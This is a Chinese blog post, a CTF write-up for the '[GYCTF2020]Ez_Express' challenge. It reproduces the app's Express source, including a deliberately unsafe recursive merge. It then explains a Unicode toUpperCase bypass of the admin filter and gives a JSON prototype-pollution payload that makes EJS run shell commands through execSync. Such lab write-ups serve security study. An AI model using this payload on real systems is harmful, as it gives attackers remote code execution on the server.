[GYCTF2020]Ez_Express

最新推荐文章于 2022-05-03 18:52:06 发布
最新推荐文章于 2022-05-03 18:52:06 发布
阅读量207 收藏
点赞数
分类专栏: 代码审计 ssti模板注入 js 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115965147
版权

在这里插入图片描述
提示要用admin登录,注册个账号登录看到源码里有提示。
在这里插入图片描述
后端是用js写的,慢慢审计吧。

#app.js
var createError = require('http-errors');
var express = require('express');
var path = require('path');
var cookieParser = require('cookie-parser');
var logger = require('morgan');
const session = require('express-session')
const randomize = require('randomatic')
const bodyParser = require('body-parser')

var indexRouter = require('./routes/index');

var app = express();

// view engine setup
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
app.disable('etag');
app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())
app.use(session({
    name: 'session',
    secret: randomize('aA0', 16),
    resave: false,
    saveUninitialized: false
}))
app.use(logger('dev'));
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(cookieParser());
app.use(express.static(path.join(__dirname, 'public')));

app.use('/', indexRouter);

// catch 404 and forward to error handler
app.use(function(req, res, next) {
  next(createError(404));
});

// error handler
app.use(function(err, req, res, next) {
  // set locals, only providing error in development
  res.locals.message = err.message;
  res.locals.error = req.app.get('env') === 'development' ? err : {};

  // render the error page
  res.status(err.status || 500);
  res.render('error');
});

module.exports = app;


#index.js
var express = require('express');
var router = express.Router();
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}
function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

  return undefined
}

router.get('/', function (req, res) {
  if(!req.session.user){
    res.redirect('/login');
  }
  res.outputFunctionName=undefined;
  res.render('index',data={'user':req.session.user.user});
});


router.get('/login', function (req, res) {
  res.render('login');
});



router.post('/login', function (req, res) {
  if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }
    res.redirect('/'); 
  }
  else if(req.body.Submit=="login"){
    if(!req.session.user){res.end("<script>alert('register first');history.go(-1);</script>")}
    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
      req.session.user.isLogin=true;
    }
    else{
      res.end("<script>alert('error passwd');history.go(-1);</script>")
    }
  
  }
  res.redirect('/'); ;
});
router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})
module.exports = router;

提示说要用admin登录,但源码里对admin进行了正则过滤,并且对用户名进行了toUpperCase()转大写。js中用toUpperCase()是会出现问题的。

在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。

我们用上面的字符进行登录
在这里插入图片描述
登录成功后有个提交界面,提示flag在 /flag中,看到源码里的merge函数想到了原型链污染。
javascript原型链污染

router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})

看到/action里面用了clone方法进行了原型链污染,/info这里进行了渲染,outputFunctionName是未定义的,很明显的原型链污染
payload:

{"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"},"Submit":""}

这里抓包把Content-Type设为application/json上面链接的文章里给出了原因。
再访问/info界面下载到flag。

fmyyy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
nodejs——ejs模版遇到原型链污染产生rce
最新发布
m0_73756016的博客
06-19 299
EJS是一个javascript模板库,用来从json数据中生成HTML字符串功能:缓存功能,能够缓存好的HTML模板;<% code %>用来执行javascript代码安装:看了一圈这个写的最详细Express+lodash+ejs: 从原型链污染到RCE懂了个大概吧就是还有这篇文章从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台大概意思就是说ejs在渲染的时候有大量代码拼接然后我们通过原型链污染达到变量覆盖就可以构造注入先闭合上面的语句再构造rce的语句。
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
EZ.RAR_EZ_ez-usb_编程器 51
09-19
标题“EZ.RAR_EZ_ez-usb_编程器 51”暗示了这是一个与51系列单片机编程相关的资源包,其中包含了EZ-USB编程器的相关软件和文档。EZ-USB是一种通用的USB接口解决方案,常用于开发USB设备,如编程器,它为51系列单片机...
express.js-ctf:用express.js编写的CTF挑战
05-04
express.js-ctf 智力,技能等方面的测试。
ez_game.zip
07-15
ez_game.zip——C++编程实现的EasyX小游戏与学习指南》 在计算机科学的世界里,C++是一种强大且广泛应用的编程语言,尤其在游戏开发领域。本资源包"ez_game.zip"是针对大一学生课程设计的一个项目,旨在帮助初学...
EZ_USB.zip
05-20
EZ_USB.zip 文件是一个包含EZUSB相关源码和驱动程序的压缩包,主要针对Windows XP和Windows 7操作系统。EZUSB是一种通用串行总线(USB)接口技术,它允许开发者创建能够通过USB与电脑交互的嵌入式设备。在这款压缩包...
python 安装插件 setuptools-40.3.0 ez_setup-0.9 pip-18.0
09-18
在Python的生态系统中,`pip`, `setuptools` 和 `ez_setup` 是安装和管理这些库和插件的重要工具。让我们详细了解一下这三个关键组件以及它们如何协同工作。 **setuptools** setuptools是Python的一个包管理和构建...
setuptools模块ez_setup.py安装文件 functl模块文件
04-24
在Python编程环境中,setuptools和ez_setup.py是两个非常关键的工具,它们主要用于包的管理和安装。functl.py则可能是一个自定义的功能性模块。让我们深入探讨这些概念及其在Python开发中的作用。 **setuptools模块...
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 505
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 2019
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
ez_udp_connect
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值